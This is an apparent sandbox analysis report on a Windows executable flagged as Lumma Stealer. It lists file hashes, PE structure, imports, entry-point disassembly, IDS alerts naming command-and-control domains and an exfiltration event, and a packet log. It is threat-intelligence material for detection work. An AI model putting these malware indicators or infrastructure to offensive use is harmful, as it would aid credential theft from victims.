                                                                                                  MD5:5530e06db7d6818359bef99c53ebef57
                                                                                                  SHA1:d43255e222c09a14f7e2cc205df120af573a15d2
                                                                                                  SHA256:d878e20cbf86109866c7fbd2ab840f58eb0927c526feed708b50d97c5bb9eff8
                                                                                                  SHA512:13b71094147451fd3419dc5e9ab735e8bf49debeeb1fea222275b10c6aa6aadf006650b91c2f4eca67f70251ba1acacf0a8262090c5e4650b2153e6b373c9d8c
                                                                                                  SSDEEP:3072:1XtJ94LTt1ffUPNCi/ijoEUz0Qa3fSbPbNh8um6fLea54bY94HPy31lcqpo9fq5t:19JmPf9obYrfSbjguz5J9Oy3Dch9
                                                                                                  TLSH:E6845B1282A17D54EA265B729E1EC6E8670EF7E18F897BB532189ADF0CB0171C173F50
                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........`8...VA..VA..VA+N.A..VA.S.A..VA.S.A..VA.S.A..VA..-A..VA..WA..VA.S.A..VA.S.A..VA.S.A..VARich..VA........................PE..L..
                                                                                                  Icon Hash:738733b18ba383e4
                                                                                                  Entrypoint:0x401926
                                                                                                  Entrypoint Section:.text
                                                                                                  Digitally signed:false
                                                                                                  Imagebase:0x400000
                                                                                                  Subsystem:windows gui
                                                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                  DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                  Time Stamp:0x6609CEBF [Sun Mar 31 20:59:43 2024 UTC]
                                                                                                  TLS Callbacks:
                                                                                                  CLR (.Net) Version:
                                                                                                  OS Version Major:5
                                                                                                  OS Version Minor:0
                                                                                                  File Version Major:5
                                                                                                  File Version Minor:0
                                                                                                  Subsystem Version Major:5
                                                                                                  Subsystem Version Minor:0
                                                                                                  Import Hash:c1ad5d94a080d1479358f349f9710f1a
                                                                                                  Instruction
                                                                                                  call 00007FA60D5810DEh
                                                                                                  jmp 00007FA60D57D01Dh
                                                                                                  mov edi, edi
                                                                                                  push ebp
                                                                                                  mov ebp, esp
                                                                                                  sub esp, 00000328h
                                                                                                  mov dword ptr [004472B0h], eax
                                                                                                  mov dword ptr [004472ACh], ecx
                                                                                                  mov dword ptr [004472A8h], edx
                                                                                                  mov dword ptr [004472A4h], ebx
                                                                                                  mov dword ptr [004472A0h], esi
                                                                                                  mov dword ptr [0044729Ch], edi
                                                                                                  mov word ptr [004472C8h], ss
                                                                                                  mov word ptr [004472BCh], cs
                                                                                                  mov word ptr [00447298h], ds
                                                                                                  mov word ptr [00447294h], es
                                                                                                  mov word ptr [00447290h], fs
                                                                                                  mov word ptr [0044728Ch], gs
                                                                                                  pushfd
                                                                                                  pop dword ptr [004472C0h]
                                                                                                  mov eax, dword ptr [ebp+00h]
                                                                                                  mov dword ptr [004472B4h], eax
                                                                                                  mov eax, dword ptr [ebp+04h]
                                                                                                  mov dword ptr [004472B8h], eax
                                                                                                  lea eax, dword ptr [ebp+08h]
                                                                                                  mov dword ptr [004472C4h], eax
                                                                                                  mov eax, dword ptr [ebp-00000320h]
                                                                                                  mov dword ptr [00447200h], 00010001h
                                                                                                  mov eax, dword ptr [004472B8h]
                                                                                                  mov dword ptr [004471B4h], eax
                                                                                                  mov dword ptr [004471A8h], C0000409h
                                                                                                  mov dword ptr [004471ACh], 00000001h
                                                                                                  mov eax, dword ptr [00446008h]
                                                                                                  mov dword ptr [ebp-00000328h], eax
                                                                                                  mov eax, dword ptr [0044600Ch]
                                                                                                  mov dword ptr [ebp-00000324h], eax
                                                                                                  call dword ptr [000000D8h]
                                                                                                  Programming Language:
                                                                                                  • [C++] VS2008 build 21022
                                                                                                  • [ASM] VS2008 build 21022
                                                                                                  • [ C ] VS2008 build 21022
                                                                                                  • [IMP] VS2005 build 50727
                                                                                                  • [RES] VS2008 build 21022
                                                                                                  • [LNK] VS2008 build 21022
                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x44b1c0x3c.rdata
                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xb30000x18208.rsrc
                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x430000x198.rdata
                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                  .text0x10000x417100x41800829bb93d31cd2773a7f15bd3ce69b393False0.8269546159351145data7.433590009651865IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                  .rdata0x430000x24440x2600653859e6cc6c4a478f73bc157a2b2c24False0.36543996710526316data5.353629372033153IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                  .data0x460000x6c8e00x5600134411ba5e3cdaf22aff6266102b03acFalse0.043740915697674417data0.5266503152859804IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                  .rsrc0xb30000x182080x18400358d317c61d0482b9cbb56388c22f000False0.3354139819587629data4.243766736540801IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                  RT_ICON0xb38100xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilIndia0.27078891257995735
                                                                                                  RT_ICON0xb38100xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilSri Lanka0.27078891257995735
                                                                                                  RT_ICON0xb46b80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilIndia0.4120036101083033
                                                                                                  RT_ICON0xb46b80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilSri Lanka0.4120036101083033
                                                                                                  RT_ICON0xb4f600x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilIndia0.532258064516129
                                                                                                  RT_ICON0xb4f600x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilSri Lanka0.532258064516129
                                                                                                  RT_ICON0xb56280x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilIndia0.5744219653179191
                                                                                                  RT_ICON0xb56280x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilSri Lanka0.5744219653179191
                                                                                                  RT_ICON0xb5b900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilIndia0.4224066390041494
                                                                                                  RT_ICON0xb5b900x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilSri Lanka0.4224066390041494
                                                                                                  RT_ICON0xb81380x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilIndia0.4971311475409836
                                                                                                  RT_ICON0xb81380x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilSri Lanka0.4971311475409836
                                                                                                  RT_ICON0xb8ac00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.499113475177305
                                                                                                  RT_ICON0xb8ac00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.499113475177305
                                                                                                  RT_ICON0xb8f900xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTamilIndia0.3355543710021322
                                                                                                  RT_ICON0xb8f900xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsTamilSri Lanka0.3355543710021322
                                                                                                  RT_ICON0xb9e380x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTamilIndia0.4002707581227437
                                                                                                  RT_ICON0xb9e380x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsTamilSri Lanka0.4002707581227437
                                                                                                  RT_ICON0xba6e00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilIndia0.39631336405529954
                                                                                                  RT_ICON0xba6e00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsTamilSri Lanka0.39631336405529954
                                                                                                  RT_ICON0xbada80x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTamilIndia0.398121387283237
                                                                                                  RT_ICON0xbada80x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsTamilSri Lanka0.398121387283237
                                                                                                  RT_ICON0xbb3100x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TamilIndia0.22157676348547717
                                                                                                  RT_ICON0xbb3100x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600TamilSri Lanka0.22157676348547717
                                                                                                  RT_ICON0xbd8b80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TamilIndia0.24859287054409004
                                                                                                  RT_ICON0xbd8b80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224TamilSri Lanka0.24859287054409004
                                                                                                  RT_ICON0xbe9600x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TamilIndia0.27909836065573773
                                                                                                  RT_ICON0xbe9600x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400TamilSri Lanka0.27909836065573773
                                                                                                  RT_ICON0xbf2e80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TamilIndia0.3147163120567376
                                                                                                  RT_ICON0xbf2e80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088TamilSri Lanka0.3147163120567376
                                                                                                  RT_ICON0xbf7c80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilIndia0.30223880597014924
                                                                                                  RT_ICON0xbf7c80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilSri Lanka0.30223880597014924
                                                                                                  RT_ICON0xc06700x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilIndia0.40478339350180503
                                                                                                  RT_ICON0xc06700x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilSri Lanka0.40478339350180503
                                                                                                  RT_ICON0xc0f180x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilIndia0.44642857142857145
                                                                                                  RT_ICON0xc0f180x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilSri Lanka0.44642857142857145
                                                                                                  RT_ICON0xc15e00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilIndia0.4407514450867052
                                                                                                  RT_ICON0xc15e00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilSri Lanka0.4407514450867052
                                                                                                  RT_ICON0xc1b480x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilIndia0.24601313320825516
                                                                                                  RT_ICON0xc1b480x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilSri Lanka0.24601313320825516
                                                                                                  RT_ICON0xc2bf00x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilIndia0.25
                                                                                                  RT_ICON0xc2bf00x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilSri Lanka0.25
                                                                                                  RT_ICON0xc35780x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.3147163120567376
                                                                                                  RT_ICON0xc35780x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.3147163120567376
                                                                                                  RT_ICON0xc3a480xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilIndia0.2747867803837953
                                                                                                  RT_ICON0xc3a480xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0TamilSri Lanka0.2747867803837953
                                                                                                  RT_ICON0xc48f00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilIndia0.3677797833935018
                                                                                                  RT_ICON0xc48f00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0TamilSri Lanka0.3677797833935018
                                                                                                  RT_ICON0xc51980x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilIndia0.37672811059907835
                                                                                                  RT_ICON0xc51980x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0TamilSri Lanka0.37672811059907835
                                                                                                  RT_ICON0xc58600x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilIndia0.37283236994219654
                                                                                                  RT_ICON0xc58600x568Device independent bitmap graphic, 16 x 32 x 8, image size 0TamilSri Lanka0.37283236994219654
                                                                                                  RT_ICON0xc5dc80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilIndia0.25881742738589214
                                                                                                  RT_ICON0xc5dc80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0TamilSri Lanka0.25881742738589214
                                                                                                  RT_ICON0xc83700x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilIndia0.275562851782364
                                                                                                  RT_ICON0xc83700x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0TamilSri Lanka0.275562851782364
                                                                                                  RT_ICON0xc94180x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilIndia0.2881147540983607
                                                                                                  RT_ICON0xc94180x988Device independent bitmap graphic, 24 x 48 x 32, image size 0TamilSri Lanka0.2881147540983607
                                                                                                  RT_ICON0xc9da00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilIndia0.32180851063829785
                                                                                                  RT_ICON0xc9da00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0TamilSri Lanka0.32180851063829785
                                                                                                  RT_STRING0xca4480x58data0.6590909090909091
                                                                                                  RT_STRING0xca4a00x57edata0.4423897581792319
                                                                                                  RT_STRING0xcaa200x726data0.4191256830601093
                                                                                                  RT_STRING0xcb1480xc0data0.5885416666666666
                                                                                                  RT_ACCELERATOR0xca2800x10data1.5
                                                                                                  RT_GROUP_ICON0xb8f280x68dataTamilIndia0.7115384615384616
                                                                                                  RT_GROUP_ICON0xb8f280x68dataTamilSri Lanka0.7115384615384616
                                                                                                  RT_GROUP_ICON0xca2080x76dataTamilIndia0.6779661016949152
                                                                                                  RT_GROUP_ICON0xca2080x76dataTamilSri Lanka0.6779661016949152
                                                                                                  RT_GROUP_ICON0xbf7500x76dataTamilIndia0.6779661016949152
                                                                                                  RT_GROUP_ICON0xbf7500x76dataTamilSri Lanka0.6779661016949152
                                                                                                  RT_GROUP_ICON0xc39e00x68dataTamilIndia0.7211538461538461
                                                                                                  RT_GROUP_ICON0xc39e00x68dataTamilSri Lanka0.7211538461538461
                                                                                                  RT_VERSION0xca2900x1b4data0.5665137614678899
                                                                                                  DLLImport
                                                                                                  KERNEL32.dllSearchPathW, OpenFile, GetConsoleAliasesLengthW, TlsGetValue, DebugActiveProcessStop, GetDefaultCommConfigW, CreateProcessW, InterlockedIncrement, MoveFileExW, GetEnvironmentStringsW, InterlockedCompareExchange, GetTimeFormatA, CallNamedPipeW, FreeEnvironmentStringsA, GetModuleHandleW, GetDateFormatA, EnumTimeFormatsW, GetVolumePathNameW, GetEnvironmentStrings, SetVolumeLabelA, GetAtomNameW, DeactivateActCtx, GetStartupInfoA, SetLastError, GetLongPathNameA, SetComputerNameA, BuildCommDCBW, GetAtomNameA, LocalAlloc, MoveFileA, SetConsoleDisplayMode, AddAtomW, VirtualProtect, Module32Next, FileTimeToLocalFileTime, DeleteTimerQueueTimer, OpenFileMappingA, GetProfileSectionW, LoadLibraryW, GetCommandLineW, GetLastError, HeapFree, HeapReAlloc, HeapAlloc, Sleep, GetProcAddress, ExitProcess, GetCommandLineA, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, HeapCreate, VirtualFree, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, VirtualAlloc, TlsAlloc, TlsSetValue, TlsFree, GetCurrentThreadId, InterlockedDecrement, WriteFile, GetStdHandle, GetModuleFileNameA, LoadLibraryA, InitializeCriticalSectionAndSpinCount, FreeEnvironmentStringsW, WideCharToMultiByte, SetHandleCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, RtlUnwind, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapSize, GetLocaleInfoA, GetConsoleCP, GetConsoleMode, FlushFileBuffers, LCMapStringA, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW, SetFilePointer, CloseHandle, WriteConsoleA, GetConsoleOutputCP, WriteConsoleW, SetStdHandle, CreateFileA
                                                                                                  GDI32.dllGetBitmapBits
                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                  TamilIndia
                                                                                                  TamilSri Lanka

                                                                                                  Download Network PCAP: filteredfull

                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                  2025-01-26T15:47:59.155701+01002059421ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (impolitewearr .biz)1192.168.2.7530911.1.1.153UDP
                                                                                                  2025-01-26T15:47:59.169214+01002059423ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (toppyneedus .biz)1192.168.2.7589041.1.1.153UDP
                                                                                                  2025-01-26T15:47:59.794618+01002059424ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI)1192.168.2.749700172.67.149.66443TCP
                                                                                                  2025-01-26T15:47:59.794618+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749700172.67.149.66443TCP
                                                                                                  2025-01-26T15:48:00.859158+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.749700172.67.149.66443TCP
                                                                                                  2025-01-26T15:48:00.859158+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749700172.67.149.66443TCP
                                                                                                  2025-01-26T15:48:01.349618+01002059424ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI)1192.168.2.749701172.67.149.66443TCP
                                                                                                  2025-01-26T15:48:01.349618+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749701172.67.149.66443TCP
                                                                                                  2025-01-26T15:48:01.865980+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.749701172.67.149.66443TCP
                                                                                                  2025-01-26T15:48:01.865980+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749701172.67.149.66443TCP
                                                                                                  2025-01-26T15:48:02.600271+01002059424ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI)1192.168.2.749702172.67.149.66443TCP
                                                                                                  2025-01-26T15:48:02.600271+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749702172.67.149.66443TCP
                                                                                                  2025-01-26T15:48:03.207759+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.749702172.67.149.66443TCP
                                                                                                  2025-01-26T15:48:03.829022+01002059424ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI)1192.168.2.749703172.67.149.66443TCP
                                                                                                  2025-01-26T15:48:03.829022+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749703172.67.149.66443TCP
                                                                                                  2025-01-26T15:48:05.459225+01002059424ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI)1192.168.2.749705172.67.149.66443TCP
                                                                                                  2025-01-26T15:48:05.459225+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749705172.67.149.66443TCP
                                                                                                  2025-01-26T15:48:06.974006+01002059424ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI)1192.168.2.749711172.67.149.66443TCP
                                                                                                  2025-01-26T15:48:06.974006+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749711172.67.149.66443TCP
                                                                                                  2025-01-26T15:48:08.667496+01002059424ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI)1192.168.2.749722172.67.149.66443TCP
                                                                                                  2025-01-26T15:48:08.667496+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749722172.67.149.66443TCP
                                                                                                  2025-01-26T15:48:11.847642+01002059424ET MALWARE Observed Win32/Lumma Stealer Related Domain (toppyneedus .biz in TLS SNI)1192.168.2.749746172.67.149.66443TCP
                                                                                                  2025-01-26T15:48:11.847642+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.749746172.67.149.66443TCP
                                                                                                  2025-01-26T15:48:12.337047+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.749746172.67.149.66443TCP
                                                                                                  • Total Packets: 103
                                                                                                  • 443 (HTTPS)
                                                                                                  • 53 (DNS)
                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Jan 26, 2025 15:47:59.186034918 CET49700443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:47:59.186085939 CET44349700172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:47:59.186151028 CET49700443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:47:59.189582109 CET49700443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:47:59.189614058 CET44349700172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:47:59.794538975 CET44349700172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:47:59.794617891 CET49700443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:47:59.798407078 CET49700443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:47:59.798420906 CET44349700172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:47:59.798768997 CET44349700172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:47:59.843177080 CET49700443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:00.113369942 CET49700443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:00.113416910 CET49700443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:00.113578081 CET44349700172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:00.859188080 CET44349700172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:00.859296083 CET44349700172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:00.859365940 CET49700443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:00.861236095 CET49700443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:00.861254930 CET44349700172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:00.861270905 CET49700443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:00.861278057 CET44349700172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:00.871609926 CET49701443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:00.871659994 CET44349701172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:00.871737003 CET49701443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:00.872083902 CET49701443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:00.872097015 CET44349701172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:01.349514008 CET44349701172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:01.349617958 CET49701443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:01.352233887 CET49701443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:01.352248907 CET44349701172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:01.352539062 CET44349701172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:01.354674101 CET49701443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:01.354707003 CET49701443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:01.354751110 CET44349701172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:01.865986109 CET44349701172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:01.866034985 CET44349701172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:01.866061926 CET44349701172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:01.866097927 CET44349701172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:01.866107941 CET49701443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:01.866137981 CET44349701172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:01.866156101 CET49701443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:01.866198063 CET44349701172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:01.866239071 CET49701443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:01.866250038 CET44349701172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:01.866596937 CET44349701172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:01.866637945 CET49701443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:01.866643906 CET44349701172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:01.870748043 CET44349701172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:01.870774984 CET44349701172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:01.870798111 CET49701443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:01.870804071 CET44349701172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:01.870806932 CET44349701172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:01.870852947 CET49701443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:01.921333075 CET49701443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:01.955650091 CET44349701172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:01.955838919 CET44349701172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:01.955892086 CET49701443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:01.955913067 CET44349701172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:01.956074953 CET44349701172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:01.956147909 CET49701443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:01.956233978 CET49701443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:01.956248999 CET44349701172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:01.956260920 CET49701443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:01.956265926 CET44349701172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:02.126146078 CET49702443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:02.126190901 CET44349702172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:02.126274109 CET49702443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:02.126719952 CET49702443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:02.126735926 CET44349702172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:02.599946976 CET44349702172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:02.600270987 CET49702443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:02.601408005 CET49702443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:02.601418972 CET44349702172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:02.601671934 CET44349702172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:02.606173992 CET49702443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:02.606390953 CET49702443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:02.606421947 CET44349702172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:03.207815886 CET44349702172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:03.208060026 CET44349702172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:03.208170891 CET49702443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:03.224893093 CET49702443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:03.224917889 CET44349702172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:03.336381912 CET49703443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:03.336441994 CET44349703172.67.149.66192.168.2.7
                                                                                                  Jan 26, 2025 15:48:03.336539984 CET49703443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:03.336961031 CET49703443192.168.2.7172.67.149.66
                                                                                                  Jan 26, 2025 15:48:03.336971998 CET44349703172.67.149.66192.168.2.7
